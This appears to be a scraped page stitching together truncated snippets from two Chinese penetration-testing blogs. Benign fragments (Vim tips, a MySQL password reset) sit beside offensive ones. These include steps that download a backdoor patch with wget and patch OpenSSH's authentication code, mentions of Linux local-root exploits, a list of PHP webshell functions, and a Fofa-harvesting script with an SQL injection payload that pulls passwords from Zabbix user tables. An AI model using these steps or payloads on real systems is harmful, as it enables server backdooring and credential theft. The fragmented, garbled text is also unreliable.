k2a.cn
渗透测试 | 星空下的守望者
http://www.k2a.cn/category/渗透测试
Web安全 漏洞预警 Python编程 渗透测试 Linux运维 www.k2a.cn. ImageMagick—-Remote Command Execute in WordPress 4.5.1. ImageMagick ImageMagick 昨天曝出 CVE-2016-37…. 使用到的工具 https:/ github.com/ring04h/udptun…. 废话不多说,直接上图 1.直接访问默认扫描当前IP的C段,获取标题、web容器…. 一、SQL注入速查表 下 0x00 目录 盲注 关于盲注 实战中的盲注实例 延…. 0x00 关于SQL注入速查表 现在仅支持MySQL、Micros…. 一 执行系统命令: 无回显执行系统命令 %Runtime.getRun…. 0x00 漏洞概述 2015年6月17日seclists网站上公布了Dedecm…. 内网转发工具———-tunna. 8212;—…. 为0x00] – 简介 [0X01] – 过滤闪避 M…. Kali linux 更新后Kernel 4.6VMWare Workstation无法启动的解决办法.
k2a.cn
Vim使用技巧之一 | 星空下的守望者
http://www.k2a.cn/181.html
Web安全 漏洞预警 Python编程 渗透测试 Linux运维 www.k2a.cn. 1 选定文字 / 拷贝粘贴. 如果要复制整行的最简单办法就是V,y,p 就行了. 对于v选定的,拷贝后就是这么多,选多少就拷贝多少,而V选定的,粘贴的话会自动换到下一行. 可以zf进行折叠, 用zo打开折叠,也可以方向键向右打开折叠,zc 关闭折叠(只要在被折叠的块中的任一个语句就行). 5 多文件编辑 / 缓冲区命令. 多文件编辑会有两种情形,一种是在进入 vim 前所用的参数就是多个文件 这种情形称为 argument list。 另一种情形是进入 vim 后另外再开其它的文件 称为 buffer list。 Vi flname1 flname2 flnameN. 这是在进入 vim 后,在不离开 vim 的情形下再开其它文件,只要您要编辑的档案是在目前目录,Tab 补全键还是可以使用。 注意 :e 或者:new 或者:split 后边可以跟目录,这样就可以在目录下慢慢找要打开的文件了. 注意,这种用法只能用于 argument list 的情形。 加号 表示这个 buffer 已经修改过了。 I 把下一行对应...
k2a.cn
Linux渗透之openSSH后门 | 星空下的守望者
http://www.k2a.cn/151.html
Web安全 漏洞预警 Python编程 渗透测试 Linux运维 www.k2a.cn. OpenSSH 6.0p1 Debian-4 deb7u2, OpenSSL 1.0.1e 11 Feb 2013. Wget http:/ www.k2a.cn/Tools/open.tar.gz (源码包. Wget http:/ www.k2a.cn/Tools/patch.tar.gz 后门文件. Cp -p /etc/ssh/sshd config{,.bak}. Tar -xzvf open.tar.gz. Tar -zxvf patch.tar.gz. Cd openssh-5.9p1.patch/. Cp sshbd5.9p1.diff ./openssh-5.9p1. Openssh-5.9p1# patch sshbd5.9p1.diff. Patching file auth.c. Patching file auth-pam.c. Patching file auth-passwd.c. Patching file canohost.c. Patching file log.c.
k2a.cn
Linux提权 | 星空下的守望者
http://www.k2a.cn/category/linux提权
Web安全 漏洞预警 Python编程 渗透测试 Linux运维 www.k2a.cn. 漏洞介绍 Perception Point研究团队发现了一个Linux内核的本地…. 269-42.ELsmp localroot EXP. 今天而然又遇到一个古老的内核2.6.9-42.ELsmp 翻一下exp貌似我有…. 废话不多说,直接上exploit x64编译好的下载地址 2.6.18-194…. CVE-2014-0196: Linux kernel = v…. Kali linux 更新后Kernel 4.6VMWare Workstation无法启动的解决办法. Stuxnet纪录片-零日 Zero.Days (2016) 中文字幕. ImageMagick—-Remote Command Execute in WordPress 4.5.1.
k2a.cn
Linux运维安全 | 星空下的守望者
http://www.k2a.cn/tag/linux运维安全
Web安全 漏洞预警 Python编程 渗透测试 Linux运维 www.k2a.cn. 漏洞介绍 Perception Point研究团队发现了一个Linux内核的本地…. 1、关闭所有的 INPUT FORWARD OUTPUT 只对某些端口开放。 Redhat Linux安装JDK 1.7. 本文就说些其中比较有用, 比较常用的命令, 若能熟练运用这些命令, 那么会发现编…. 1 选定文字 / 拷贝粘贴 v为可视模式,可以选定多行。 1、linux文件系统分配策略 块分配( block allocation )…. Kali linux 更新后Kernel 4.6VMWare Workstation无法启动的解决办法. Stuxnet纪录片-零日 Zero.Days (2016) 中文字幕. ImageMagick—-Remote Command Execute in WordPress 4.5.1.
nxadmin.com
Win server 2003/08 | 阿德马Web安全
http://www.nxadmin.com/category/system/winserver
分类目录归档 Win server 2003/08. Php后门木马常用的函数大致上可分为四种类型 1. 执行系统命令: system, passthru, shell exec, exec, popen, proc open . 作者 NP 老文章转载 我们来谈下提权前的, WIN系统 服务器内部信息探测 因为现在机器基本上都是2K3以上了,所以我们的话题主要围绕2K3谈 我们拿到一个低权限的WEBSHELL后,一般都是先探测服务器内部信息,以找到可以提权的条件或桥梁。 中国电信公司windows操作系统安全配置指南是中国电信公司网络运营维护事业部的基本系统安全配置规范.此文档包括了数据库(mysql,mssql),操作系统(windows server 2003,linux),应用中间件(IIS,apache,Tomcat)等的基本安全配置和安全加固的方法,以及注. 一、帐户登录事件 下面显示了由 审核帐户登录事件 安全模板设置所生成的安全事件。 672 已成功颁发和验证身份验证服务 (AS) 票证。 解决]Unable to find image ‘xxx’ locally.
nxadmin.com
Linux/Unix | 阿德马Web安全
http://www.nxadmin.com/category/system/linux-system
1ssh -V #查看当前的ssh版本信息 #OpenSSH 5.3p1, OpenSSL 1.0.0-fips 29 Mar 2010 2.查找ssh的配置文件 一般都在/etc/ssh中 3.备份原来的文件的time 将/etc/ssh下的文件的备份 假设/etc/ssh/sshd config 备份为/etc/ssh/sshd config.old. 本文由Sky原创投稿,请尊重劳动成果,转载注明出处 测试环境 Centos 6.2 64位 0x01:查询本机的PAM版本 下载地址 http:/ www.linux-pam.org/library/ https:/ fedorahosted.org/rel. 作者 Sky yakexi009@gmail.com 1.PAM工作流程 2.PAM 配置文件语法 module-type control-flag module path optional 在/etc/pam.d/下的文件中,与服务名称相对应的文件,为该. 本文例举了十大PHP最佳安全实践方式,能够让您轻松、安全配置PHP. PHP安全性设置提示 DocumentRoo.
nxadmin.com
Fofa搜索结果采集及漏洞利用小脚本 | 阿德马Web安全
http://www.nxadmin.com/tools/1344.html
Http:/ zone.wooyun.org/content/17971. Coding:utf-8 import urllib2,urllib,cookielib import re,sys import base64 import os,json def vulwebsearch(keywords): vulhostlist=[] urlenkeywords=urllib2.quote(keywords) searchurl=http:/ fofa.so/api/result? Applications=2%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%28select%20concat%28cast%28concat%28alias,0x7e,passwd,0x7e%29%20as%20char%29,0x7e%29%29%20from%20zabbix.users%20LIMIT%200,1%29,floor%28rand%280%29*2%29%29x%20from%20inform...
nxadmin.com
Centos修改mysql密码 | 阿德马Web安全
http://www.nxadmin.com/system/1340.html
启动成功后查看mysql进程信息, 获取 mysqld safe. Ps -ef grep -i mysql. Root 3466 1 0 01:45 pts/1 00:00:00 /bin/sh /usr/bin/mysqld safe. 8211;datadir=/var/lib/mysql –pid-file=/var/lib/mysql/BSC.TEST.pid. Mysql 3569 3466 16 01:45 pts/1 00:00:00 /usr/sbin/mysqld –basedir=/usr –datadir=/var/lib/mysql –plugin-dir=/usr/lib64/mysql/plugin –user=mysql –log-error=/var/lib/mysql/BSC.TEST.err –pid-file=/var/lib/mysql/BSC.TEST.pid. Root 3597 3105 0 01:45 pts/1 00:00:00 grep -i mysql. 可以看到mysqld safe的安装位置 上面标蓝色部分 /usr/bin/.